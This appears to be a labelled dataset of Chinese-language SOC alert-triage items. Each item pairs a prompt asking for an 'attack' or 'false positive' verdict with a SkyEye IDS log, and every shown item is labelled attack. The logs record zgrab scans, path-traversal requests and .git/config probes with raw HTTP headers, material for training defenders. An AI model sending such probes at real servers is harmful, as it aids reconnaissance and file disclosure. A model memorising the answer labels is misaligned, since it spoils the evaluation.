"host_state": "失败", "rule_key": "webids", "api": "218.76.15.56:443/", "first_access_time": "2024-11-27 18:12:41", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国--纽约州--纽约", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现扫描工具-zgrab", "alarm_sip": "172.31.192.179", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "e932557aa1cbc6619b791db98b0c5b05", "proto": "http", "xff": "", "alarm_id": "20241127_45b5844bc530f513bdc135bd44d41fe8", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "attack_chain": "0x01050000", "access_time": "2024-11-27 18:12:41", "attack_addr": "美国--纽约州--纽约(40.714550/-74.007141)", "type_chain": "140E0000", "vuln_harm": "攻击者可以利用该工具收集目标信息。", "dip_addr": "局域网", "dport": "443", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732702341", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "172.206.143.92", "public_date": "2023-03-17 16:17:23", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "68", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002098e", "req_header": "GET / HTTP/1.1\r\nHost: 218.76.15.56:443\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "172.206.143.92", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568974-发现扫描工具-zgrab", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "1c0c58bccb3d726e5a88f34f1864d3da", "sport": "41672", "h_url": "/", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 zgrab/0.x"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732702360", "vlan_id": "", "vuln_type": "发现扫描工具-zgrab", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.47.67", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732702360, "vuln_harm": "攻击者可以利用该工具收集目标信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.47.67", "site_app": "", "hit_end": 68, "uri": "/", "dport": 443, "vuln_name": "发现扫描工具-zgrab", "rsp_status": 0, "code_language": "", "solution": "关闭不必要的端口。", "hit_start": 48, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "xff": "", "sip": "172.206.143.92", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "public_date": "2023-03-17 16:17:23", "sport": 56550}, "solution": "关闭不必要的端口。", "hit_start": "48", "skyeye_id": "", "payload": {"req_header": "R0VUIC8gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS4yNjo0NDMNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIHpncmFiLzAueA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "file_md5": "", "host": "218.76.15.26:443", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.26:443/", "first_access_time": "2024-11-27 18:12:40", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国--纽约州--纽约", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现扫描工具-zgrab", "alarm_sip": "172.23.47.67", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "383251587c32916bcdd099bcc6e87c21", "proto": "http", "xff": "", "alarm_id": "20241127_1df7e6fb0e4d92cb124fd16c1c9a6a97", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "attack_chain": "0x01050000", "access_time": "2024-11-27 18:12:40", "attack_addr": "美国--纽约州--纽约(40.714550/-74.007141)", "type_chain": "140E0000", "vuln_harm": "攻击者可以利用该工具收集目标信息。", "dip_addr": "局域网", "dport": "443", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732702339", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "172.206.143.92", "public_date": "2023-03-17 16:17:23", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "68", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002098e", "req_header": "GET / HTTP/1.1\r\nHost: 218.76.15.26:443\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "172.206.143.92", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568974-发现扫描工具-zgrab", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "b463958809b4db303f18ed43c2097043", "sport": "56550", "h_url": "/", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 zgrab/0.x"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732700442", "vlan_id": "", "vuln_type": "路径穿越攻击(机器学习)", "rule_version_str": "3.0.1122.14572", "attack_type": "目录遍历", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.68.194", "sip_group": "", "repeat_count": "1", "type": "目录遍历", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732700442, "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/../../static/cmaps", "dport": 30001, "vuln_name": "路径穿越攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "xff": "", "sip": "223.104.132.85", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "public_date": "2020-11-25 19:44:53", "sport": 49759}, "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uLi8uLi9zdGF0aWMvY21hcHMgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41Ng0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkwLjAuNDQzMC4yMTIgU2FmYXJpLzUzNy4zNg0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "file_md5": "", "host": "218.76.15.56", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.56/../../static/cmaps", "first_access_time": "2024-11-27 17:40:42", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--湖南省--娄底市", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "路径穿越攻击(机器学习)", "alarm_sip": "172.23.68.194", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "56a16b1680f1966e91a8beefe3e57d9c", "proto": "http", "xff": "", "alarm_id": "20241127_5c0f2c3ba1630443163a65672009767d", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "attack_chain": "0x02010000", "access_time": "2024-11-27 17:40:42", "attack_addr": "中国--湖南省--娄底市(27.738416/111.984394)", "type_chain": "160B0000", "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "dip_addr": "局域网", "dport": "30001", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732700421", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "223.104.132.85", "public_date": "2020-11-25 19:44:53", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/../../static/cmaps", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/../../static/cmaps", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020b6b", "req_header": "GET /../../static/cmaps HTTP/1.1\r\nHost: 218.76.15.56\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.104.132.85", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569451-路径穿越攻击(机器学习)", "rule_labels": "{}", "host_md5": "095da5df0c3fc970a426552d3060b04d", "sport": "49759", "h_url": "/../../static/cmaps", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732700441", "vlan_id": "", "vuln_type": "发现目录穿越攻击行为", "rule_version_str": "3.0.1122.14572", "attack_type": "目录遍历", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.68.194", "sip_group": "", "repeat_count": "1", "type": "目录遍历", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732700441, "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 73, "uri": "/../../static/cmaps", "dport": 30001, "vuln_name": "发现目录穿越攻击行为", "rsp_status": 0, "code_language": "通用", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": 53, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "xff": "", "sip": "223.104.132.85", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "public_date": "2018-08-16 18:57:22", "sport": 49759}, "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": "53", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uLi8uLi9zdGF0aWMvY21hcHMgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41Ng0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkwLjAuNDQzMC4yMTIgU2FmYXJpLzUzNy4zNg0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "file_md5": "", "host": "218.76.15.56", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.56/../../static/cmaps", "first_access_time": "2024-11-27 17:40:41", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--湖南省--娄底市", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现目录穿越攻击行为", "alarm_sip": "172.23.68.194", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "374a08c013ae1ce64b7af436df000fea", "proto": "http", "xff": "", "alarm_id": "20241127_79327507340ce46267ebae0e25faa653", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "attack_chain": "0x02010000", "access_time": "2024-11-27 17:40:41", "attack_addr": "中国--湖南省--娄底市(27.738416/111.984394)", "type_chain": "160B0000", "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "dip_addr": "局域网", "dport": "30001", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732700421", "code_language": "通用", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "223.104.132.85", "public_date": "2018-08-16 18:57:22", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/../../static/cmaps", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "73", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/../../static/cmaps", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002055d", "req_header": "GET /../../static/cmaps HTTP/1.1\r\nHost: 218.76.15.56\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.104.132.85", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567901-发现目录穿越攻击行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Chrome/90.0.4430\", \"hw_type\": \"PC\"}}", "host_md5": "095da5df0c3fc970a426552d3060b04d", "sport": "49759", "h_url": "/../../static/cmaps", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732698444", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732698444, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.243", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "3.251.68.146", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 42028}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE3DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMDkuMC4wLjAgU2FmYXJpLzUzNy4zNiBFZGcvMTA5LjAuMTUxOC4xNDANCkFjY2VwdC1DaGFyc2V0OiB1dGYtOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.17", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.17/.git/config", "first_access_time": "2024-11-27 17:07:24", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "爱尔兰--都柏林郡--都柏林", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "ed76a8783a557f386e5eae5b62552cb3", "proto": "http", "xff": "", "alarm_id": "20241127_c14eaa673e1135acbdf89008f7026de9", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 17:07:24", "attack_addr": "爱尔兰--都柏林郡--都柏林(53.349764/-6.260246)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732698424", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "3.251.68.146", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "accept-charset": "utf-8", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: 218.76.15.17\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.140\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "3.251.68.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Edge/109.0.1518\", \"hw_type\": \"PC\"}}", "host_md5": "8e92c0757fd0b686d9fd85100838e2b6", "sport": "42028", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.140"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732698322", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.218", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732698322, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.218", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 443, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "185.208.156.160", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 37980}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE5OjQ0Mw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xKSBBcHBsZVdlYktpdC81MzUuMiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xOC42Ljg3Mi4wIFNhZmFyaS81MzUuMiBVTlRSVVNURUQvMS4wIDNncHAtZ2JhIFVOVFJVU1RFRC8xLjANCkFjY2VwdC1DaGFyc2V0OiB1dGYtOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.19:443", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.19:443/.git/config", "first_access_time": "2024-11-27 17:05:22", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.31.193.218", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "815ab9a53f289ff9344cada0d580c6c3", "proto": "http", "xff": "", "alarm_id": "20241127_e0102efd167dc470c8af807013b3414e", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 17:05:22", "attack_addr": "美国(39.765054/-101.407912)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "443", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732698301", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "185.208.156.160", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "accept-charset": "utf-8", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: 218.76.15.19:443\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "185.208.156.160", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Chrome/18.6.872\", \"hw_type\": \"PC\"}}", "host_md5": "bf19e26533083fd22e5ef8ec307373a5", "sport": "37980", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0"} | 攻击 |
